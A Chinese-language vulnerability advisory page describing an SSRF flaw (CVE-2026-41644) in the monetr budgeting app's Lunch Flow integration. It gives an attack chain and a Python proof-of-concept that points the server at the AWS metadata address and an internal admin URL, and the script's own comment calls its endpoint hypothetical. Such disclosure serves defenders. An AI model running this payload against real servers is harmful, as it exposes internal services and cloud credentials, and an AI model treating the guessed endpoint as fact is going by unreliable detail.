IPBUF安全漏洞报告
English
CVE-2026-41644 CVSS 7.1 高危

CVE-2026-41644 monetr SSRF漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41644
漏洞类型
SSRF
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
monetr

相关标签

SSRFmonetrCWE-918信息泄露

漏洞概述

monetr是一款预算管理应用。在1.12.5版本之前,其Lunch Flow集成模块存在服务器端请求伪造(SSRF)漏洞。经过身份认证的用户可利用此漏洞诱导服务器向任意URL发送HTTP GET请求。由于上游非200状态的响应体会被反射在API错误信息中,攻击者可能借此探测内网服务或读取敏感信息。

技术细节

该漏洞源于monetr应用在处理Lunch Flow集成请求时,未对用户提供的URL参数进行严格的过滤和验证。攻击者可以利用已登录的低权限账户,构造包含恶意URL的API请求。服务器在接收到请求后,会代替客户端向该URL发起HTTP GET请求。由于系统错误处理机制存在缺陷,当目标URL返回非200状态码时,响应体会被直接包含在API的错误消息中返回给攻击者。这种“盲”SSRF结合响应回显的特性,使得攻击者能够扫描内网端口、访问云元数据服务(如AWS IMDSv1)或读取本地受限文件,从而造成信息泄露。

攻击链分析

STEP 1
1. 身份认证
攻击者获取monetr应用的一个普通用户账户凭证,完成登录。
STEP 2
2. 构造恶意请求
攻击者向Lunch Flow集成接口发送特制的API请求,在参数中填入内网地址或敏感URL(如http://127.0.0.1/admin)。
STEP 3
3. 服务端请求
monetr服务器解析请求,代替用户向攻击者指定的URL发起HTTP GET请求。
STEP 4
4. 响应回显
如果目标URL返回非200状态码(如404或500),服务器会将响应体内容封装在API错误信息中返回给攻击者,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: monetr SSRF PoC (CVE-2026-41644) # Description: Sends a malicious request to trigger SSRF via Lunch Flow integration # Usage: python3 poc.py <target_url> <attacker_url> target_url = "http://localhost:8080/api/lunch/flow/callback" # Hypothetical endpoint malicious_url = "http://169.254.169.254/latest/meta-data/" # Example AWS Metadata auth_token = "Bearer YOUR_SESSION_TOKEN" headers = { "Authorization": auth_token, "Content-Type": "application/json" } # Payload attempting to force server-side request payload = { "url": malicious_url, "token": "test" } try: response = requests.post(target_url, json=payload, headers=headers, verify=False) print(f"[+] Status: {response.status_code}") print(f"[+] Response: {response.text}") # Check if the internal response is leaked in the error message except Exception as e: print(f"[-] Error: {e}")

影响范围

monetr < 1.12.5

防御指南

临时缓解措施
若无法立即升级,建议暂时禁用Lunch Flow集成功能,并在网络防火墙层面对monetr服务器的出站流量进行严格管控,仅允许访问必要的外部API地址。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表